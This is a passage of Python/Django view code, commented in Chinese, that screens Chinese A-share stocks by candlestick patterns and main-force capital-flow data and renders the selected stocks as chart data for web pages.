倒数第一日交易日股票数据\n stock_id_list0 = [s[0] for s in judge_0 if float(s[1]) < float(s[2])] # 倒数第1日红色股票代码\n\n # 找寻stock_id_list0中下影线特别短,成交量上涨,圆柱实体具有一定长度的股票\n sid_stock = []\n for sid in stock_id_list0:\n prices = [(float(s[1]), float(s[2]), float(s[3]), float(s[4]), int(s[5])) for s in judge_0 if\n s[0] == sid] # 获取开盘价, 收盘价,最低价,最高价\n price_open = prices[0][0]\n price_close = prices[0][1]\n price_low = prices[0][2]\n price_high = prices[0][3]\n volumn0 = prices[0][4]\n volumn1 = [int(s[3]) for s in judge_1 if s[0] == sid][0] # 倒数第二天的成交量\n try:\n if ((price_open - price_low) / price_low < 0.001) and (\n (price_close - price_open) / (\n price_high - price_low) > 0.2) and volumn0 > volumn1: # 下影线短,开收盘价与最高低价比例的判定\n sid_stock.append(sid)\n except Exception:\n continue\n\n stocks_cash = CashFlowData.objects.filter(stock_id__in=sid_stock, stock_date=tradeday_0) # 最新一天的资金净流入数据\n value_cash = stocks_cash.values_list('stock_id', 'maincash_in') # 提取主力净流入数据\n value_pos_cash = [s for s in value_cash if not s[1].startswith('-')] # 提取资金流正流入的股票\n value_Pos_cash = [s for s in value_pos_cash if s[1].endswith('万') or s[1].endswith('亿')] # 去掉资金净流入还不足万元的股票\n num_Pos_cash = [(s[0], float(s[1][:-1])) if s[1].endswith('万') else (s[0], float(s[1][:-1]) * 10 ** 4) for s in\n value_Pos_cash] # 将股票的净流入数据变成浮点数\n num_sorted = sorted(num_Pos_cash, key=lambda s: s[1], reverse=True) # 按照净流入从大到小排序\n sid_stock_cash = [s[0] for s in num_sorted] # 提取股票代码\n sid_stock_cash = sid_stock_cash[:30] # 最多选取30支股票\n return sid_stock_cash\n\n\ndef KmeansStrategy3(index_day=3): # KmeansStrategy2_1的改进版,最后用主力参与度进行排序\n (*_, tradeday_0, tradeday_1, tradeday_2) = KmeansData.objects.filter(stock_id='601988').dates('stock_date', 'day',\n order='DESC')[\n :index_day] # 提取中国银行的倒数第三个交易日,作为所有股票的倒数第三个交易日,本行第一个数字为控制变量,默认且最小为3.\n stocks_2 = KmeansData.objects.filter(stock_date__range=(tradeday_2, tradeday_0)) # 获取特定三个交易日的所有股票\n judge_2 = stocks_2.filter(stock_date=tradeday_2).values_list('stock_id', 'price_open',\n 'price_close') # 获取倒数第三个交易日的股票代码,开盘价,收盘价\n stock_id_list2 = [s[0] for s in judge_2 if float(s[1]) > float(s[2])] # 倒数第三日满足开盘价大于收盘价(绿)的股票代码,别忘了将字符串转换为浮点数\n judge_1 = stocks_2.filter(stock_id__in=stock_id_list2, stock_date=tradeday_1).values_list('stock_id',\n 'price_open',\n 'price_close',\n 'stock_volumn') # 倒数第2个交易日的股票代码,开盘价,收盘价\n stock_id_list1 = [s[0] for s in judge_1 if float(s[1]) > float(s[2])] # 倒数第2日绿色股票代码\n judge_0 = stocks_2.filter(stock_id__in=stock_id_list1, stock_date=tradeday_0).values_list('stock_id',\n 'price_open',\n 'price_close',\n 'price_low',\n 'price_high',\n 'stock_volumn') # 倒数第一日交易日股票数据\n stock_id_list0 = [s[0] for s in judge_0 if float(s[1]) < float(s[2])] # 倒数第1日红色股票代码\n\n # 找寻stock_id_list0中下影线特别短,成交量上涨,圆柱实体具有一定长度的股票\n sid_stock = []\n for sid in stock_id_list0:\n prices = [(float(s[1]), float(s[2]), float(s[3]), float(s[4]), int(s[5])) for s in judge_0 if\n s[0] == sid] # 获取开盘价, 收盘价,最低价,最高价\n price_open = prices[0][0]\n price_close = prices[0][1]\n price_low = prices[0][2]\n price_high = prices[0][3]\n volumn0 = prices[0][4]\n volumn1 = [int(s[3]) for s in judge_1 if s[0] == sid][0] # 倒数第二天的成交量\n try:\n if ((price_open - price_low) / price_low < 0.001) and (\n (price_close - price_open) / (\n price_high - price_low) > 0.2) and volumn0 > volumn1: # 下影线短,开收盘价与最高低价比例的判定\n sid_stock.append(sid)\n except Exception:\n continue\n\n stocks_cash = CashFlowData.objects.filter(stock_id__in=sid_stock, stock_date=tradeday_0) # 最新一天的资金净流入数据\n value_cash = stocks_cash.values_list('stock_id', 'maincash_in') # 提取主力净流入数据\n value_pos_cash = [s for s in value_cash if not s[1].startswith('-')] # 提取资金流正流入的股票\n value_Pos_cash = [s for s in value_pos_cash if s[1].endswith('万') or s[1].endswith('亿')] # 去掉资金净流入还不足万元的股票\n num_Pos_cash = [(s[0], float(s[1][:-1])) if s[1].endswith('万') else (s[0], float(s[1][:-1]) * 10 ** 4) for s in\n value_Pos_cash] # 将股票的净流入数据变成浮点数\n num_sorted = sorted(num_Pos_cash, key=lambda s: s[1], reverse=True) # 按照净流入从大到小排序\n sid_stock_cash = [s[0] for s in num_sorted] # 提取股票代码\n\n # 按照主力参与程度进行排序\n cstocks = CashFlowData.objects.filter(stock_id__in=sid_stock_cash,\n stock_date__range=(tradeday_1, tradeday_0)).order_by('stock_date')\n cdatas0 = cstocks.values_list('stock_id', 'join_degree')\n cdatas1 = defaultdict(list)\n for k, v in cdatas0:\n cdatas1[k].append(float(v[:-1]))\n\n cdatas2 = [(k, cdatas1[k][1] - cdatas1[k][0]) for k in cdatas1 if\n len(cdatas1[k]) == 2 and cdatas1[k][1] - cdatas1[k][0] > 0]\n cdatas2_sort = sorted(cdatas2, key=lambda s: s[1], reverse=True)\n cdatas3 = cdatas2_sort[:20] # 呈现的股票数量\n stock_id = [s[0] for s in cdatas3]\n\n return stock_id\n\n\ndef KmeansStrategy3_1(index_day=3): # KmeansStrategy3的改进版,最后一日去掉各种繁琐的限制条件 跌/跌/涨\n (*_, tradeday_0, tradeday_1, tradeday_2) = KmeansData.objects.filter(stock_id='601988').dates('stock_date', 'day',\n order='DESC')[\n :index_day] # 提取中国银行的倒数第三个交易日,作为所有股票的倒数第三个交易日,本行第一个数字为控制变量,默认且最小为3.\n stocks_2 = KmeansData.objects.filter(stock_date__range=(tradeday_2, tradeday_0)) # 获取特定三个交易日的所有股票\n judge_2 = stocks_2.filter(stock_date=tradeday_2).values_list('stock_id', 'price_open',\n 'price_close') # 获取倒数第三个交易日的股票代码,开盘价,收盘价\n stock_id_list2 = [s[0] for s in judge_2 if float(s[1]) > float(s[2])] # 倒数第三日满足开盘价大于收盘价(绿)的股票代码,别忘了将字符串转换为浮点数\n judge_1 = stocks_2.filter(stock_id__in=stock_id_list2, stock_date=tradeday_1).values_list('stock_id',\n 'price_open',\n 'price_close') # 倒数第2个交易日的股票代码,开盘价,收盘价\n stock_id_list1 = [s[0] for s in judge_1 if float(s[1]) > float(s[2])] # 倒数第2日绿色股票代码\n judge_0 = stocks_2.filter(stock_id__in=stock_id_list1, stock_date=tradeday_0).values_list('stock_id',\n 'price_open',\n 'price_close') # 倒数第一日交易日股票数据\n stock_id_list0 = [s[0] for s in judge_0 if float(s[1]) < float(s[2])] # 倒数第1日红色股票代码\n\n # 股票当日涨跌幅小于特定值\n # var_degree = CashFlowData.objects.filter(stock_id__in=stock_id_list0, stock_date=tradeday_0).values_list('stock_id',\n # 'var_degree')\n # var_degree = [s for s in var_degree if s[1].endswith('%')] # 股票的涨跌幅存在\n # stock_id_list0 = [s[0] for s in var_degree if float(s[1][:-1]) < 3] # 涨跌幅小于特定数值\n\n # 最后一日主力资金净流入,并且主力成本与收盘价的差距不能过大(实测后,效果不好)\n # stocks0 = CashFlowData.objects.filter(stock_id__in=stock_id_list0, stock_date=tradeday_0)\n # judge0 = stocks0.values_list('stock_id', 'maincash_in', 'price_close', 'main_cost')\n # s0 = [s for s in judge0 if not s[1].startswith('-')] # 去掉主力净流出的股票\n # s1 = [s for s in s0 if float(s[2]) - float(s[3]) < 0.1] # 选出收盘价与主力成本的差值小于0.1的股票\n # stock_id_list0 = [s[0] for s in s1] # 提取股票代码\n\n # 按照主力参与程度进行排序\n cstocks = CashFlowData.objects.filter(stock_id__in=stock_id_list0,\n stock_date__range=(tradeday_1, tradeday_0)).order_by('stock_date')\n cdatas0 = cstocks.values_list('stock_id', 'join_degree')\n cdatas1 = defaultdict(list)\n for k, v in cdatas0:\n cdatas1[k].append(float(v[:-1]))\n\n cdatas2 = [(k, cdatas1[k][1] - cdatas1[k][0]) for k in cdatas1 if\n len(cdatas1[k]) == 2 and cdatas1[k][1] - cdatas1[k][0] > 2] # 主力参与度(今日-昨日)>2%\n cdatas2_sort = sorted(cdatas2, key=lambda s: s[1], reverse=True)\n cdatas3 = cdatas2_sort[:10] # 呈现的股票数量\n stock_id = [s[0] for s in cdatas3]\n\n return stock_id\n\n\ndef reverse_kmeans(index_day=4): # 直接观察跌/跌/涨之后,最后一天大涨的股票规律\n (*_, tradeday_0, tradeday_1, tradeday_2, tradeday_3) = KmeansData.objects.filter(stock_id='601988').dates(\n 'stock_date', 'day', order='DESC')[:index_day] # 本行第一个数字为控制变量,默认且最小为4.\n stocks = KmeansData.objects.filter(stock_date__range=(tradeday_3, tradeday_0)) # 获取特定4个交易日的所有股票\n judge_3 = stocks.filter(stock_date=tradeday_3).values_list('stock_id', 'price_open',\n 'price_close') # 获取倒数第4个交易日的股票代码,开盘价,收盘价\n stock_id_list3 = [s[0] for s in judge_3 if float(s[1]) > float(s[2])] # 倒数第4日满足开盘价大于收盘价(绿)的股票代码,别忘了将字符串转换为浮点数\n judge_2 = stocks.filter(stock_id__in=stock_id_list3, stock_date=tradeday_2).values_list('stock_id', 'price_open',\n 'price_close') # 倒数第3个交易日的股票代码,开盘价,收盘价\n stock_id_list2 = [s[0] for s in judge_2 if float(s[1]) > float(s[2])] # 倒数第3日绿色股票代码\n judge_1 = stocks.filter(stock_id__in=stock_id_list2, stock_date=tradeday_1).values_list('stock_id', 'price_open',\n 'price_close') # 倒数第2日交易日股票数据\n stock_id_list1 = [s[0] for s in judge_1 if float(s[1]) < float(s[2])] # 倒数第2日红色股票代码\n judge_0 = stocks.filter(stock_id__in=stock_id_list1, stock_date=tradeday_0).values_list('stock_id', 'price_open',\n 'price_close') # 倒数第1日股票数据\n stocks_0 = [s for s in judge_0 if float(s[1]) < float(s[2])] # 倒数第1日红色股票\n stocks_0 = sorted(stocks_0, key=lambda s: float(s[1]) - float(s[2]))\n stocks_choose = stocks_0[:10]\n stock_id_choose = [s[0] for s in stocks_choose]\n\n return stock_id_choose\n\n\n# kmeans 的 session3函数,利用自建的数据表KStockList来存取昨日与今日的股票数据,更新状态\ndef kmeans_session3(request):\n now = datetime.now() # 获取实时时间\n index_day = 1\n try:\n stock_kid_yes = KStockList.objects.get(pk=1)\n except Exception:\n stock_kid_yes = KStockList.objects.get_or_create(stock_kid_yes=KmeansStrategy2_1(index_day + 3),\n defaults={'pk': 1})\n stock_kid_yes = stock_kid_yes[0]\n stock_kid_yes = stock_kid_yes.stock_kid_yes\n if isinstance(stock_kid_yes, str):\n stock_kid_yes = eval(stock_kid_yes) # 如此将stock_kid_yes 变成list\n\n try:\n stock_kid_now = KStockList.objects.get(pk=2)\n except Exception:\n stock_kid_now = KStockList.objects.get_or_create(stock_kid_now=KmeansStrategy2_1(index_day + 2),\n defaults={'pk': 2}) # 实测, pk不能与1重复\n stock_kid_now = stock_kid_now[0]\n stock_kid_now = stock_kid_now.stock_kid_now\n if isinstance(stock_kid_now, str):\n stock_kid_now = eval(stock_kid_now)\n\n try:\n kflag = KStockList.objects.get(pk=3)\n except Exception:\n kflag = KStockList.objects.get_or_create(kflag=0, defaults={'pk': 3})\n kflag = kflag[0]\n kflag = int(kflag.kflag)\n\n # 以数据库的方式记录更新状态\n # count_knew = int(request.COOKIES.get('count_knew', False)) # 计算stock_id_new 被调用过几次\n if now.hour >= 16 and not kflag: # 这里count_new调用一次即可,若鲁棒性太差,可以设置为计数的方式,如count_new<5,当hour<17时,count_new=1\n stock_kid_new = KmeansStrategy2_1(index_day + 2)\n KStockList.objects.filter(pk=3).update(kflag=1)\n if stock_kid_now != stock_kid_new: # 如果不相等,说明数据有更新\n stock_kid_yes = stock_kid_now\n KStockList.objects.filter(pk=1).update(stock_kid_yes=stock_kid_yes)\n stock_kid_now = stock_kid_new\n KStockList.objects.filter(pk=2).update(stock_kid_now=stock_kid_now)\n if now.hour < 16 and kflag: # 自己点赞,颇为巧妙\n KStockList.objects.filter(pk=3).update(kflag=0)\n\n return stock_kid_yes, stock_kid_now\n\n\ndef KmeansStrategy4(index_day=5): # 寻找股市红三兵 跌/跌/涨/涨/涨,后面三天每天的涨幅低于3%\n (*_, tradeday_0, tradeday_1, tradeday_2, tradeday_3, tradeday_4) = KmeansData.objects.filter(\n stock_id='601988').dates('stock_date', 'day', order='DESC')[\n :index_day] # 提取中国银行的倒数第5个交易日,作为所有股票的倒数第5个交易日,本行第一个数字为控制变量,默认且最小为5.\n stocks = KmeansData.objects.filter(stock_date__range=(tradeday_4, tradeday_0)) # 获取特定三个交易日的所有股票\n judge_4 = stocks.filter(stock_date=tradeday_4).values_list('stock_id', 'price_open',\n 'price_close') # 获取倒数第5个交易日的股票代码,开盘价,收盘价\n stock_id_list4 = [s[0] for s in judge_4 if float(s[1]) > float(s[2])] # 倒数第5日满足开盘价大于收盘价(绿)的股票代码,别忘了将字符串转换为浮点数\n judge_3 = stocks.filter(stock_id__in=stock_id_list4, stock_date=tradeday_3).values_list('stock_id',\n 'price_open',\n 'price_close') # 倒数第4个交易日的股票代码,开盘价,收盘价\n stock_id_list3 = [s[0] for s in judge_3 if float(s[1]) > float(s[2])] # 倒数第4日绿色股票代码\n\n judge_2 = stocks.filter(stock_id__in=stock_id_list3, stock_date=tradeday_2).values_list('stock_id',\n 'price_open',\n 'price_close') # 倒数第3日交易日股票数据\n stock_id_list2 = [s[0] for s in judge_2 if float(s[1]) < float(s[2])] # 倒数第3日红色股票代码\n cstocks = CashFlowData.objects.filter(stock_id__in=stock_id_list2,\n stock_date__range=(tradeday_2, tradeday_0)) # 资金流的相关数据\n var_degree2 = cstocks.filter(stock_id__in=stock_id_list2, stock_date=tradeday_2).values_list('stock_id',\n 'var_degree')\n datas2 = [s for s in var_degree2 if s[1].endswith('%')]\n stock_id_list2 = [s[0] for s in datas2 if float(s[1][:-1]) < 11] # 涨幅小于1个百分点\n\n judge_1 = stocks.filter(stock_id__in=stock_id_list2, stock_date=tradeday_1).values_list('stock_id', 'price_open',\n 'price_close') # 倒数第2日交易日股票数据\n stock_id_list1 = [s[0] for s in judge_1 if float(s[1]) < float(s[2])] # 倒数第2日红色股票代码\n var_degree1 = cstocks.filter(stock_id__in=stock_id_list1, stock_date=tradeday_1).values_list('stock_id',\n 'var_degree')\n datas1 = [s for s in var_degree1 if s[1].endswith('%')]\n stock_id_list1 = [s[0] for s in datas1 if float(s[1][:-1]) < 21]\n\n judge_0 = stocks.filter(stock_id__in=stock_id_list1, stock_date=tradeday_0).values_list('stock_id', 'price_open',\n 'price_close') # 倒数第1日交易日股票数据\n stock_id_list0 = [s[0] for s in judge_0 if float(s[1]) < float(s[2])] # 倒数第1日红色股票代码\n var_degree0 = cstocks.filter(stock_id__in=stock_id_list0, stock_date=tradeday_0).values_list('stock_id',\n 'var_degree')\n datas0 = [s for s in var_degree0 if s[1].endswith('%')]\n stock_id_list0 = [s[0] for s in datas0 if float(s[1][:-1]) < 31]\n\n # 股票当日涨跌幅小于特定值\n # var_degree = CashFlowData.objects.filter(stock_id__in=stock_id_list0, stock_date=tradeday_0).values_list('stock_id',\n # 'var_degree')\n # var_degree = [s for s in var_degree if s[1].endswith('%')] # 股票的涨跌幅存在\n # stock_id_list0 = [s[0] for s in var_degree if float(s[1][:-1]) < 3] # 涨跌幅小于特定数值\n\n # 按照主力参与程度进行排序\n cstocks_join = CashFlowData.objects.filter(stock_id__in=stock_id_list0,\n stock_date__range=(tradeday_1, tradeday_0)).order_by('stock_date')\n cdatas0 = cstocks_join.values_list('stock_id', 'join_degree')\n cdatas1 = defaultdict(list)\n for k, v in cdatas0:\n cdatas1[k].append(float(v[:-1]))\n\n cdatas2 = [(k, cdatas1[k][1] - cdatas1[k][0]) for k in cdatas1 if\n len(cdatas1[k]) == 2 and cdatas1[k][1] - cdatas1[k][0] > 0]\n cdatas2_sort = sorted(cdatas2, key=lambda s: s[1], reverse=True)\n cdatas3 = cdatas2_sort[:10] # 呈现的股票数量\n stock_id = [s[0] for s in cdatas3]\n\n # stock_id = stock_id_list0\n\n return stock_id\n\n\n# @cache_page(60 * 15)\ndef k_means(request):\n visitcount(request)\n kdata_dated = KmeansData.objects.filter(stock_date__lte=day_fixed_before_kdata) # 筛选出过时数据\n kdata_dated.delete() # 删除\n\n context_dict = {} # 上下文字典\n\n now = datetime.now() # 获取实时时间\n\n workday = [0, 1, 2, 3, 4] # 星期一至星期五\n if (now.weekday() in workday) and (15 <= now.hour < 17): # 工作日的15:00-16:00之间\n context_dict['time_blank'] = '17点后更新'\n # count_knew = 0\n else:\n index_day = 1 # 最小值为1, 代表最新的一天\n\n (*_, tradeday_0) = KmeansData.objects.filter(stock_id='601988').dates('stock_date', 'day', order='DESC')[\n :index_day]\n stocks_var = CashFlowData.objects.filter(stock_date=tradeday_0)\n # data_var_degree = stocks_var.values_list('var_degree', flat=True)\n # count_float = (float(x[:-1]) if x.endswith('%') else 0 for x in data_var_degree)\n # count_rise = len([x for x in count_float if x > 0])\n # print('the number of rise stocks:', count_rise) # 所有print中的数据改成英文\n # print('total stocks:', stocks_var.count())\n # print('the ratio of rise stocks:', count_rise / stocks_var.count())\n\n stock_id_list = KmeansStrategy3_1(index_day + 2) # 获取符合选股策略的股票代码, 见上面的函数\n stock_id_list_yes = KmeansStrategy3_1(index_day + 3)\n # stock_id_list = KmeansStrategy4(index_day + 4)\n # stock_id_list_yes = KmeansStrategy4(index_day + 5)\n # stock_id_list_yes = reverse_kmeans(index_day + 3)\n context_dict['trade_day'] = tradeday_0 # 交易日,用在模板的表格中\n\n # stock_id = kmeans_session3(request) # session函数\n # stock_id_list = stock_id[1]\n # stock_id_list_yes = stock_id[0] # 前一天,用来回测数据\n # count_knew = stock_id[2] # 从session函数返回的count_new,记录stock_kid_now与stock_kid_new是否相等的状态\n\n stocks_yes = stock_yes_test(stock_id_list_yes, index_day)\n\n if stocks_yes:\n context_dict['stocks_yes'] = stocks_yes[0]\n context_dict['average_var'] = stocks_yes[1]\n context_dict['average_count'] = stocks_yes[2]\n context_dict['stocks'] = ChangeToEchartsData_kdata(stock_id_list) # 将选择出的股票转换为符合echarts的数据结构,常规模式\n\n # context_dict['stocks'] = ChangeToEchartsData() # 单独调试\n\n response = render(request, 'choose_stock/k_means.html', context_dict)\n # expire_day = cookie_expire_time(16) # 每天的16时为cookie的更新时间\n # response.set_cookie('count_knew', count_knew, expires=expire_day)\n # response.set_cookie('count_knew', count_knew, max_age=1) # 10分���后cookie到期\n\n return response\n\n\n# -----------------------------中线布局相关----------------------------------\ndef K_middle_Strategy(index_day=2): # 按照高抛低吸的特点,结合历史数据,寻找K线图的低点.策略:最后两日略涨,最后1日的股价处于历史低点附近\n (*_, tradeday_0, tradeday_1) = KmeansData.objects.filter(stock_id='601988').dates('stock_date', 'day',\n order='DESC')[\n :index_day] # 提取中国银行交易日日期数据,本行第一个数字为控制变量,默认且最小为2.\n stocks_1 = KmeansData.objects.filter(stock_date__range=(tradeday_1, tradeday_0)) # 获取特定2个交易日的所有股票\n judge_1 = stocks_1.filter(stock_date=tradeday_1).values_list('stock_id', 'price_open',\n 'price_close') # 获取倒数第2个交易日的股票代码,开盘价,收盘价\n stock_id_list1 = [s[0] for s in judge_1 if float(s[1]) < float(s[2])] # 倒数第2日红\n judge_0 = stocks_1.filter(stock_id__in=stock_id_list1, stock_date=tradeday_0).values_list('stock_id',\n 'price_open',\n 'price_close') # 倒数第1个交易日的股票代码,开盘价,收盘价\n stock_id_list0 = [s[0] for s in judge_0 if float(s[1]) < float(s[2])] # 倒数第1日红色股票代码\n\n # 去掉除权的股票(断崖式下跌的股票),\n stocks_var = CashFlowData.objects.filter(stock_id__in=stock_id_list0, stock_date__lte=tradeday_0).values_list(\n 'stock_id', 'var_degree')\n var_list = defaultdict(list)\n for k, v in stocks_var:\n if v.endswith('%'):\n var_list[k].append(float(v[:-1]))\n stock_id_list0 = [k for k in var_list if min(var_list[k]) > -10.5]\n\n # 股票当日涨跌幅小于特定值\n # var_degree = CashFlowData.objects.filter(stock_id__in=stock_id_list0, stock_date=tradeday_0).values_list('stock_id',\n # 'var_degree')\n # var_degree = [s for s in var_degree if s[1].endswith('%')] # 股票的涨跌幅存在\n # stock_id_list0 = [s[0] for s in var_degree if float(s[1][:-1]) < 3] # 涨跌幅小于特定数值\n\n stocks = KmeansData.objects.filter(stock_id__in=stock_id_list0, stock_date__lte=tradeday_0).order_by('stock_date')\n kdatas0 = stocks.values_list('stock_id', 'price_low', 'price_high')\n kdatas1 = defaultdict(list)\n for k, v1, v2 in kdatas0:\n kdatas1[k].append((float(v1), float(v2)))\n\n kdatas2 = [(k, min(kdatas1[k])[0], max(kdatas1[k], key=lambda s: s[1])[1]) for k in kdatas1 if\n min(kdatas1[k])[0] > 0] # 提取每只股票的最低价,最高价,注意提取方法\n\n kdatas3 = []\n for item in kdatas2:\n stock_id = item[0]\n price_min = item[1]\n price_max = item[2]\n if price_max - price_min > 5: # 保证最大值与最小值的差不低于特定值,股票有上涨空间\n price_close = [s[2] for s in judge_0 if s[0] == stock_id][0]\n diff1 = float(price_close) - price_min # 收盘价与最低价的差\n diff2 = price_max - float(price_close) # 收盘价与最高价的差\n try:\n diff = diff1 / diff2 # 距离差比\n except Exception:\n continue\n kdatas3.append((stock_id, diff))\n\n kdatas3_sort = sorted(kdatas3, key=lambda s: s[1]) # 距离差比按照从小到大排列\n kdatas4 = kdatas3_sort[:10]\n stock_id = [s[0] for s in kdatas4]\n\n return stock_id\n\n\ndef k_middle(request):\n visitcount(request)\n context_dict = {} # 上下文字典\n\n now = datetime.now() # 获取实时时间\n\n workday = [0, 1, 2, 3, 4] # 星期一至星期五\n if (now.weekday() in workday) and (15 <= now.hour < 16): # 工作日的15:00-16:00之间\n context_dict['time_blank'] = '16点后更新'\n else:\n index_day = 1 # 最小值为1, 代表最新的一天\n\n (*_, tradeday_0) = KmeansData.objects.filter(stock_id='601988').dates('stock_date', 'day', order='DESC')[\n :index_day]\n context_dict['trade_day'] = tradeday_0 # 交易日,用在模板的表格中\n\n stock_id_list = K_middle_Strategy(index_day + 1) # 获取符合选股策略的股票代码, 见上面的函数\n context_dict['stocks'] = ChangeToEchartsData_kdata(stock_id_list) # 将选择出的股票转换为符合echarts的数据结构,常规模式\n\n return render(request, 'choose_stock/k_middle.html', context_dict)\n\n\n# -----------------------------资金流相关函数---------------------------------\ndef ChangeToEchartsData_cdata(stock_id_list=['000705', '300016', '002090', '300110']):\n stocks = CashFlowData.objects.filter(stock_id__in=stock_id_list).order_by('stock_date')\n stock_seen = list({(stock.stock_id, stock.stock_name) for stock in stocks})\n # stock_seen = Name_Id.objects.filter(stock_id__in=stock_id_list).values_list('stock_id', 'stock_name')\n stocks_new = []\n for sid in stock_seen:\n stock = {} # 重构每支股票\n stock['stock_id'] = sid[0]\n stock['stock_name'] = sid[1]\n stock['stock_date'] = [str(s.stock_date) for s in stocks if s.stock_id == sid[0]]\n maincash_data = [s.maincash_in for s in stocks if s.stock_id == sid[0]]\n maincash_data_rise = [] # 资金净流入\n maincash_data_fall = [] # 资金净流出\n for eachdata in maincash_data:\n if not (eachdata.endswith('万') or eachdata.endswith('亿')):\n number = 0 # 如'-'或者小于1万的数据,全部近似处理为0\n elif eachdata.endswith('亿'):\n number = float(eachdata[:-1]) * 10 ** 4\n else:\n number = float(eachdata[:-1])\n # try:\n # unit = eachdata[-1] # 资金流数据单位,\"亿\"或者\"万\"\n # number = float(eachdata[:-1]) # 数字,字符串形式\n # except Exception as e:\n # print('switch number error:', e, sid)\n # number = 0\n # if unit == '亿':\n # number *= 10 ** 4\n if number > 0:\n maincash_data_rise.append(number)\n maincash_data_fall.append('-')\n else:\n maincash_data_rise.append('-')\n maincash_data_fall.append(number)\n stock['maincash_data_rise'] = maincash_data_rise\n rise_temp = [x for x in maincash_data_rise if isinstance(x, float)]\n stock['maincash_data_fall'] = maincash_data_fall\n fall_temp = [x for x in maincash_data_fall if isinstance(x, float)]\n try:\n stock['average_rise'] = sum(rise_temp) / len(rise_temp) # 净流入平均值\n stock['average_fall'] = sum(fall_temp) / len(fall_temp) # 净流出平均值\n # 主力净占比\n # maincash_rate = [float(s.maincash_in_rate[:-1]) for s in stocks if s.stock_id == sid[0]] # 单位为%, 比实际数大100倍\n except Exception as e:\n print('switch number or division error:', e, sid)\n # continue\n # maincash_rate = [float(s.maincash_in_rate[:-1]) for s in stocks if s.stock_id == sid[0]] # 单位为%, 比实际数大100倍\n maincash_rate = [s.maincash_in_rate for s in stocks if s.stock_id == sid[0]]\n maincash_rate = [float(s[:-1]) if s != '-' else 0 for s in\n maincash_rate] # 貌似此处当s=='-'是,s必须设为0,echarts的'line'图需要\n stock['maincash_rate'] = maincash_rate\n\n # 收盘价与主力成本\n stock['price_close'] = [float(s.price_close) for s in stocks if s.stock_id == sid[0]]\n main_cost = [s.main_cost for s in stocks if s.stock_id == sid[0]]\n stock['main_cost'] = [float(s) if s else '-' for s in main_cost] # 列表解析,带else的,要写前面\n\n # 机构参与度和控盘类型\n join_degree = (s.join_degree for s in stocks if s.stock_id == sid[0])\n stock['join_degree'] = [float(s[:-1]) if s else '-' for s in join_degree] # 空白时替换为'-'号,不然echarts这贱人会犯莫名其妙的错误\n control_type = [s.control_type for s in stocks if s.stock_id == sid[0]]\n stock['control_type'] = [s if s else '-' for s in control_type]\n\n stocks_new.append(stock)\n return stocks_new\n\n\ndef CashFlowStrategy1(index_day=1): # 策略1: 最后一天净流入,大于平均值,(收盘价-成本价)从小到大排列10个\n (*_, tradeday_0) = CashFlowData.objects.filter(stock_id='601988').dates('stock_date', 'day', order='DESC')[\n :index_day] # 获取最近的交易日,\"[]\"中的数最小为1\n stocks = CashFlowData.objects.filter(stock_date__lte=tradeday_0).order_by('stock_date')\n id_maincash = stocks.values_list('stock_id', 'maincash_in')\n id_maincash2 = defaultdict(list) # 初始化字典\n for k, v in id_maincash:\n id_maincash2[k].append(v)\n\n stock_id1 = [] # 储存最后一天主力资金净流入大于净流入平均值的股票代码\n for k in id_maincash2:\n k_maincash = id_maincash2[k]\n pos_maincash = [x for x in k_maincash if not x.startswith('-')] # 去掉以'-'开头的maincash\n try:\n float_maincash = [float(x[:-1]) if x[-1] == '万' else float(x[:-1]) * 10 ** 4 for x in\n pos_maincash] # 转换为浮点数\n average_maincash = sum(float_maincash) / len(float_maincash)\n if k_maincash[-1][-1] == '万':\n last_maincash = float(k_maincash[-1][:-1])\n else:\n last_maincash = float(k_maincash[-1][:-1]) * 10 ** 4\n if last_maincash > average_maincash * 2: # 净流入大于1.5倍的平均值\n stock_id1.append(k)\n except Exception as e:\n print('switch number error:', e, k)\n continue\n\n stocks1 = stocks.filter(stock_id__in=stock_id1, stock_date=tradeday_0)\n judge1 = stocks1.values_list('stock_id', 'price_close', 'main_cost')\n sorted_judge = sorted(judge1, key=lambda s: float(s[1]) - float(s[2])) # 以(收盘价-开盘价)又小到大排序\n stocks_id2 = sorted_judge[:20] # 前特定数量的股票,不足也行\n stocks_id2_1 = [s[0] for s in stocks_id2] # 取出股票代码\n return stocks_id2_1\n\n\ndef CashFlowStrategy2(index_day=1): # 策略2: 最后一天净流入,大于平均值,前三次净流入均小于平均值,(收盘价-成本价)从小到大排列10个\n (*_, tradeday_0) = CashFlowData.objects.filter(stock_id='601988').dates('stock_date', 'day', order='DESC')[\n :index_day] # 获取最近的交易日,\"[]\"中的数最小为1\n stocks = CashFlowData.objects.filter(stock_date__lte=tradeday_0).order_by('stock_date')\n # test_id = ['002647', '603519', '600228', '002587', '002762', '002569', '300284', '002379']\n # stocks = CashFlowData.objects.filter(stock_id__in=test_id, stock_date__lte=tradeday_0).order_by('stock_date')\n id_maincash = stocks.values_list('stock_id', 'maincash_in')\n id_maincash2 = defaultdict(list) # 初始化字典\n for k, v in id_maincash:\n id_maincash2[k].append(v)\n\n stock_id1 = [] # 储存最后一天主力资金净流入大于净流入平均值的股票代码\n for k in id_maincash2:\n\n # 下面三行代码放在此处严重影响性能, 尽量不要在循环中去不停地访问数据库\n # k_other_data = stocks.filter(stock_id=k).values_list('price_close', 'main_cost') # 取得股票的收盘价与主力成本价\n # if not (k_other_data.last()[0] and k_other_data.last()[1]): # 如果最后一天的收盘价或者主力成本不存在,则过滤掉该函数\n # continue\n k_maincash = id_maincash2[k]\n pos_maincash = [x for x in k_maincash if not x.startswith('-')] # 去掉以'-'开头的maincash\n if not pos_maincash: # 去掉查询的最后一天无主力资金净流入数据的空股票,需不需要加pos_maincash[-1]\n continue\n elif not pos_maincash[-1]:\n continue\n if not (pos_maincash[-1].endswith('万') or pos_maincash[-1].endswith('亿')): # 去掉万以下的数据\n continue\n\n try:\n float_maincash = [float(x[:-1]) if x[-1] == '万' else float(x[:-1]) * 10 ** 4 for x in\n pos_maincash] # 转换为浮点数\n average_maincash = sum(float_maincash) / len(float_maincash)\n\n if float_maincash[-2] < average_maincash and float_maincash[-3] < average_maincash and float_maincash[\n -4] < average_maincash:\n ave3_less = True\n else:\n ave3_less = False\n continue\n\n if k_maincash[-1][-1] == '万':\n last_maincash = float(k_maincash[-1][:-1])\n else:\n last_maincash = float(k_maincash[-1][:-1]) * 10 ** 4\n\n if last_maincash > average_maincash * 2 and ave3_less and last_maincash > 1000: # 净流入大于特定倍数的平均值, 大于1000(判定为热门股票)\n k_other_data = stocks.filter(stock_id=k).values_list('price_close', 'main_cost',\n 'var_degree') # 取得股票的收盘价与主力成本价\n if not (k_other_data.last()[0] and 